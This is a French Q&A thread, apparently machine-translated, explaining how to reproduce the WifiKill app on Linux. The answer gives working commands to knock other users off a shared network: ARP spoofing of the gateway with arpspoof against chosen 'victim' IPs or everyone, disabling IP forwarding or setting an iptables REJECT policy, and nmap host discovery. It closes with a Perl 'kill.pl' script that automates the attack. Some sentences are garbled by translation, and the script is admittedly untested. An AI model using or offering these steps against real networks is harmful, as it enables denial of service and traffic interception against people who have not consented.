Existe-t-il un programme (de préférence Linux) similaire à l'application Android WifiKill?
Existe-t-il un programme (de préférence Linux) similaire à l'application Android WifiKill?
Réponses:
Eh bien, Android est Linux, donc vous pouvez reproduire les actions de ponury WifiKill sur votre ordinateur Linux
WifiKill fait deux choses:
Pour le masquage, vous avez besoin du spoofing ARP. Vous pouvez utiliser le arpspoof commande de dsniff :
route -n dans un terminal et obtenez l'adresse IP de la passerelle à partir de là. Dans le cas le plus courant (vous êtes uniquement connecté au réseau sans fil), la passerelle serait l’entrée avec Destination. 0.0.0.0. Vous pouvez utiliser route -n|grep ^0.0.0.0|cut -d' ' -f 10 obtenir l'IP de la passerelle par défaut arpspoof se faire passer pour la passerelle. Courir arpspoof $IP en tant que root si vous voulez tuer tout le réseau sauf vous, ou exécuter arpspoof -t $VICTIM_IP $IP pour chaque victime si vous voulez tuer seulement certains hôtes Maintenant, vous vous faites passer pour la passerelle du réseau. Tous les paquets envoyés par les victimes sont envoyés sur votre ordinateur. Vous devez maintenant désactiver le transfert de paquets. Pour faire cette course echo -n 0 > /proc/sys/net/ipv?/ip_forward en tant que racine. Cela laissera tomber tous les paquets envoyés par les victimes
Ça fait longtemps que je n'ai pas utilisé WifiKill, mais je me souviens qu’il y avait une option pour rejeter les paquets au lieu de les laisser tomber [le rejet donne aux gens une erreur de connexion instantanée, le fait de laisser toutes leurs connexions expirer]. Pour ce faire, vous devez:
echo -n 1 > /proc/sys/net/ipv?/ip_forward comme racine netfilter La politique FORWARD par défaut de REJECT. Courir iptables -P FORWARD REJECT. Bien sûr, vous pouvez utiliser iptables pour des règles de pare-feu arbitrairement complexes WifiKill répertorie également les hôtes en ligne. Pour faire cela sous Linux, vous pouvez utiliser nmap faire un ping sur des hôtes dans une plage donnée. Par exemple, si vous voulez savoir quels hôtes sont en ligne dans la gamme 192.168.1.1 à 192.168.1.254 tu peux courir nmap -sP 192.168.1.1-254. Bien que cela ne répertorie pas les ordinateurs dotés de pare-feu «furtifs», vous pouvez toujours les tuer si vous tuez tout le monde sur le réseau ou si vous connaissez leur adresse IP exacte.
Il pourrait y avoir un programme là-bas faisant ce que j'ai énuméré ci-dessus, mais dans le cas le plus courant, vous pouvez écrire un script:
#!/usr/bin/perl -w
#This is untested code. Compiling works, but I haven't tested anything more
my $gw=`route -n|grep ^0.0.0.0|cut -d' ' -f 10`;
if (@ARGV) {
print "arpspoof -t $_ $gw &" for (@ARGV);
} else {
print "arpspoof $gw &";
}
system "echo 0 > $_" for(</proc/sys/net/ipv?/ip_forward>);
Enregistrer ceci sous kill.pl puis appelez-le comme ./kill.pl $IP1 $IP2 ... $IPn tuer $IP1, $IP2, ..., $IPn ou comme ./kill.pl tuer tous les hôtes